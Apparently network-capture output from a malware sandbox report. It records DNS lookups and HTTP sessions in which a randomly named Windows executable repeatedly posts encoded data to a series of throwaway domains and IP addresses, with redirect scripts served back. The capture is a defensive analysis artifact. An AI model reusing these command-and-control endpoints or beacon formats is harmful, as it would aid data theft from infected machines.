                                                                Nov 27, 2024 08:57:14.333226919 CET5003580192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:14.453541994 CET8050035156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:14.453756094 CET5003580192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:14.465193033 CET5003580192.168.2.6156.251.17.224
                                                                Nov 27, 2024 08:57:14.585241079 CET8050035156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:16.023740053 CET8050035156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:16.023772955 CET8050035156.251.17.224192.168.2.6
                                                                Nov 27, 2024 08:57:16.023931026 CET5003580192.168.2.6156.251.17.224
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 27, 2024 08:53:44.108885050 CET | 192.168.2.6 | 1.1.1.1 | 0xa4bd | Standard query (0) | www.nb-shenshi.buzz | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:01.005546093 CET | 192.168.2.6 | 1.1.1.1 | 0x387c | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:16.460041046 CET | 192.168.2.6 | 1.1.1.1 | 0x334f | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:17.454854012 CET | 192.168.2.6 | 1.1.1.1 | 0x334f | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:52.662734985 CET | 192.168.2.6 | 1.1.1.1 | 0xaa63 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:53.673640013 CET | 192.168.2.6 | 1.1.1.1 | 0xaa63 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:08.333807945 CET | 192.168.2.6 | 1.1.1.1 | 0xaf1c | Standard query (0) | www.amayavp.xyz | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:23.350951910 CET | 192.168.2.6 | 1.1.1.1 | 0xacb3 | Standard query (0) | www.vayui.top | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:38.475526094 CET | 192.168.2.6 | 1.1.1.1 | 0x9a50 | Standard query (0) | www.rgenerousrs.store | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:53.725893021 CET | 192.168.2.6 | 1.1.1.1 | 0xa18 | Standard query (0) | www.t91rl7.pro | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:08.896739960 CET | 192.168.2.6 | 1.1.1.1 | 0xa8b3 | Standard query (0) | www.learnwithus.site | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:23.787120104 CET | 192.168.2.6 | 1.1.1.1 | 0x7926 | Standard query (0) | www.cuthethoi.online | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:32.287235975 CET | 192.168.2.6 | 1.1.1.1 | 0x98de | Standard query (0) | www.rafconstrutora.online | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:47.085015059 CET | 192.168.2.6 | 1.1.1.1 | 0x30a | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:48.080501080 CET | 192.168.2.6 | 1.1.1.1 | 0x30a | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:49.080096960 CET | 192.168.2.6 | 1.1.1.1 | 0x30a | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:57:04.834625959 CET | 192.168.2.6 | 1.1.1.1 | 0x3282 | Standard query (0) | www.duwixushx.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 08:53:44.586126089 CET | 1.1.1.1 | 192.168.2.6 | 0xa4bd | No error (0) | www.nb-shenshi.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:01.703109980 CET | 1.1.1.1 | 192.168.2.6 | 0x387c | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:54:01.703109980 CET | 1.1.1.1 | 192.168.2.6 | 0x387c | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:01.703109980 CET | 1.1.1.1 | 192.168.2.6 | 0x387c | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:01.703109980 CET | 1.1.1.1 | 192.168.2.6 | 0x387c | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:01.703109980 CET | 1.1.1.1 | 192.168.2.6 | 0x387c | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:17.566705942 CET | 1.1.1.1 | 192.168.2.6 | 0x334f | No error (0) | www.xcvbj.asia | | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:17.593024969 CET | 1.1.1.1 | 192.168.2.6 | 0x334f | No error (0) | www.xcvbj.asia | | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:53.751955032 CET | 1.1.1.1 | 192.168.2.6 | 0xaa63 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:54:53.751955032 CET | 1.1.1.1 | 192.168.2.6 | 0xaa63 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:54:53.751955032 CET | 1.1.1.1 | 192.168.2.6 | 0xaa63 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:54:53.811294079 CET | 1.1.1.1 | 192.168.2.6 | 0xaa63 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:54:53.811294079 CET | 1.1.1.1 | 192.168.2.6 | 0xaa63 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 08:54:53.811294079 CET | 1.1.1.1 | 192.168.2.6 | 0xaa63 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:08.853184938 CET | 1.1.1.1 | 192.168.2.6 | 0xaf1c | No error (0) | www.amayavp.xyz | | 185.27.134.144 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:23.922013998 CET | 1.1.1.1 | 192.168.2.6 | 0xacb3 | No error (0) | www.vayui.top | | 172.67.145.234 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:23.922013998 CET | 1.1.1.1 | 192.168.2.6 | 0xacb3 | No error (0) | www.vayui.top | | 104.21.95.160 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:38.840070963 CET | 1.1.1.1 | 192.168.2.6 | 0x9a50 | No error (0) | www.rgenerousrs.store | | 172.67.167.146 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:38.840070963 CET | 1.1.1.1 | 192.168.2.6 | 0x9a50 | No error (0) | www.rgenerousrs.store | | 104.21.57.248 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:55:54.155776978 CET | 1.1.1.1 | 192.168.2.6 | 0xa18 | No error (0) | www.t91rl7.pro | | 154.88.22.101 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:09.324672937 CET | 1.1.1.1 | 192.168.2.6 | 0xa8b3 | No error (0) | www.learnwithus.site | | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:24.230391026 CET | 1.1.1.1 | 192.168.2.6 | 0x7926 | Server failure (2) | www.cuthethoi.online | none | none | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:32.728244066 CET | 1.1.1.1 | 192.168.2.6 | 0x98de | No error (0) | www.rafconstrutora.online | | 104.21.34.103 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:32.728244066 CET | 1.1.1.1 | 192.168.2.6 | 0x98de | No error (0) | www.rafconstrutora.online | | 172.67.159.24 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:50.030931950 CET | 1.1.1.1 | 192.168.2.6 | 0x30a | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:50.030946970 CET | 1.1.1.1 | 192.168.2.6 | 0x30a | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:56:50.030966043 CET | 1.1.1.1 | 192.168.2.6 | 0x30a | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 08:57:05.399054050 CET | 1.1.1.1 | 192.168.2.6 | 0x3282 | No error (0) | www.duwixushx.xyz | | 156.251.17.224 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49777 | 161.97.168.245 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 08:53:44.728030920 CET | 501 | OUT | GET /xxr1/?6dr=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM65kw/IL4BQaU5/Yfn2j/HOFiURDDVRtX+aUGy8uGla3Axtt/A0yI=&Kp=6N8LUn6pGPW HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Host: www.nb-shenshi.buzz
Connection: close
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
Nov 27, 2024 08:53:45.960243940 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 27 Nov 2024 07:53:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cd104a-b96"
                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 27, 2024 08:53:45.960347891 CET | 1236 | IN | Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Nov 27, 2024 08:53:45.960359097 CET | 448 | IN | Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
Nov 27, 2024 08:53:45.960370064 CET | 250 | IN | Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49819 | 27.124.4.246 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 08:54:01.844566107 CET | 755 | OUT | POST /sgdd/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Host: www.laohub10.net
Origin: http://www.laohub10.net
Referer: http://www.laohub10.net/sgdd/
Cache-Control: no-cache
Content-Length: 208
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Ascii: 6dr=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLe46ca1MZ9ssQflX4ij/a+WDD8vrnQh/JYGxuPxcKwGUP
Nov 27, 2024 08:54:03.190831900 CET | 525 | IN | HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: max-age=86400
Age: 1
Connection: Close
Content-Length: 350
                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49824 | 27.124.4.246 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 08:54:04.517178059 CET | 779 | OUT | POST /sgdd/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Host: www.laohub10.net
Origin: http://www.laohub10.net
Referer: http://www.laohub10.net/sgdd/
Cache-Control: no-cache
Content-Length: 232
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Ascii: 6dr=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGjB8tzVQB/jaGJudmQt/yxsFzQpD144gMTNFUi51vadzg==
Nov 27, 2024 08:54:05.865360975 CET | 525 | IN | HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: max-age=86400
Age: 1
Connection: Close
Content-Length: 350
                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49831 | 27.124.4.246 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 08:54:07.195000887 CET | 1792 | OUT | POST /sgdd/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Host: www.laohub10.net
Origin: http://www.laohub10.net
Referer: http://www.laohub10.net/sgdd/
Cache-Control: no-cache
Content-Length: 1244
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Ascii: 6dr=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we8MoPnTnN8xAKvyXTObuzl0ROrjtxtCjYGn+pZABTYW7Jx/DThdzs48jpVaJD1NUA2dKAkVvb//xBOgjY7r5JdrXMmxzJmQgj4+e+Adw+s1u3kuTqepDCORCfamYQkYT8cURHm7nkhDg41ncr6fZd0TpSFplS1sJ4zJFFGQgFH1Awcz3M0fW+vLOvsMfN/uuRjajnwk2w7BpZHH63qNnC/4DmMU/lKSfjxcLcqj84DOhQtlCmhEeGZBFP+iS6VezUoYI+x6UCXnsJUtF2n2ZST1Gvth58qNeSVlsrxguAKPQG69C0uQy9UKylVIUFpNYcf93MFxKIWTnLQ8VCI4PryojYy2lluIIESYrE6a4taxQeUKBUM983ztVzhapZ/0dwrTJphaZq+tKLU4kk1L0+xr+RaXqHYfB+j8vQaIj0nkiKAfqef3oLNV2oKQ0RdBmqWtZYQoo9GxGno1ZtRT9lKVUvh+5ELiUKgsBfSwQ4pE3yI4mubtAZ027M9XIjd5qT2b0sfP4QcPruNgXNZ9BoiMcVwEcMzxZg3FiSuZDh98PP06kT6uf5GJbxBLUVvTVhxyWwU+6s/BzfVlTaxKKTfjBaWtA/cxhOyF1tTkSpsDCUckz8EBhqc0QxDTS87/BIKO2IOvazStVBFHMNQz5okuWX+Ehe54tRs9sw1gIiPfTnz0pOMH3lDW5rxMufwC1mzF1VQ8SolEI1e8xYwYLC4oYdEJ2eSKzwybOIsKGqQQ2rncXH2ZKpKXmbSuGhPz9bmq6wCEnfw8xk9quaVdtyxgtgidCbZk2q44Xoqwn0UTnc3T8qFiVIdL9YupKyM8pPSqRZN2e3IgI/nLDHAo/UIRVwmnRFDzMvj9K/K9YNolQo310NgkgQ8NEXRI/PZTZS8CZllUnheh0UA2Myorh6CfaJoQUMT1ednu4cqGPfkHmERv1Aivhxv4XleXId6x4AiVArhjS [TRUNCATED]
Nov 27, 2024 08:54:08.549874067 CET | 525 | IN | HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Accept-Ranges: bytes
Cache-Control: max-age=86400
Age: 1
Connection: Close
Content-Length: 350
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 4 | 192.168.2.6 | 49838 | 27.124.4.246 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:54:09.854370117 CET | 498 | OUT | GET /sgdd/?6dr=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZRjDpBSVBr7xCoBK9DVxTDHFUGGR5RoH3IsxqdsiGMvHVT1pqSHQ=&Kp=6N8LUn6pGPW HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-US
                                                                Host: www.laohub10.net
                                                                Connection: close
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                 Nov 27, 2024 08:54:11.242377996 CET | 525 | IN | HTTP/1.1 200 OK
                                                                Server: Apache
                                                                Content-Type: text/html; charset=utf-8
                                                                Accept-Ranges: bytes
                                                                Cache-Control: max-age=86400
                                                                Age: 1
                                                                Connection: Close
                                                                Content-Length: 350
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 62 6a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f [TRUNCATED]
                                                                Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?h="+window.location.host;if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 5 | 192.168.2.6 | 49858 | 149.88.81.190 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:54:17.709693909 CET | 749 | OUT | POST /rq1s/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.xcvbj.asia
                                                                Origin: http://www.xcvbj.asia
                                                                Referer: http://www.xcvbj.asia/rq1s/
                                                                Cache-Control: no-cache
                                                                Content-Length: 208
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 6c 47 4a 4e 55 79 46 2b 6d 75 79 76 6d 68 68 7a 42 53 64 4d 63 33 4e 4b 36 55 76 66 69 4a 71 2f 4a 67 48 4f 42 75 2b 62 63 38 30
                                                                Data Ascii: 6dr=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJlGJNUyF+muyvmhhzBSdMc3NK6UvfiJq/JgHOBu+bc80


                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                 6 | 192.168.2.6 | 49865 | 149.88.81.190 | 80 | 4872 | C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                 Nov 27, 2024 08:54:20.384290934 CET | 773 | OUT | POST /rq1s/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US
                                                                Host: www.xcvbj.asia
                                                                Origin: http://www.xcvbj.asia
                                                                Referer: http://www.xcvbj.asia/rq1s/
                                                                Cache-Control: no-cache
                                                                Content-Length: 232
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                Data Raw: 36 64 72 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 58 50 4b 34 4d 64 66 43 4a 41 39 4a 59 48 63 57 69 5a 55 6f 5a 58 73 47 6b 39 52 72 7a 71 44 62 57 74 4c 54 64 79 41 72 5a 4c 6d 51 3d 3d
